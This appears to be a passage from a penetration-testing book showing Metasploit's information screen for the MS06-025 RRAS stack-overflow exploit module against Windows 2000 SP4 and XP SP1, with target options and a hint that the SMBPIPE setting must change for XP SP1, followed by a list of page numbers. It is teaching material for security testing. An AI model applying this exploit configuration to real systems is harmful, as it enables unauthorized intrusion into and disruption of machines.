The
Microsoft security bulletin lists XP SP1 as anonymously attackable. Let??™s take a closer
look at this exploit.
msf exploit(ms06_025_rras) > info
Name: Microsoft RRAS Service Overflow
Version: 4498
Platform: Windows
Privileged: Yes
License: Metasploit Framework License
Provided by:
Nicolas Pouvesle
hdm
Available targets:
Id Name
-- ----
0 Windows 2000 SP4
1 Windows XP SP1
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.1.220 yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE ROUTER yes The pipe name to use (ROUTER, SRVSVC)
Payload information:
Space: 1104
Avoid: 1 characters
Description:
This module exploits a stack overflow in the Windows Routing and
Remote Access Service. Since the service is hosted inside
svchost.exe, a failed exploit attempt can cause other system
services to fail as well. A valid username and password is required
to exploit this flaw on Windows 2000. When attacking XP SP1, the
SMBPIPE option needs to be set to 'SRVSVC'.
The exploit description claims that to attack XP SP1, the SMBPIPE option needs to be
set to SRVSVC. You can see from our preceding options display that the SMBPIPE is set
to ROUTER.
Pages:
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213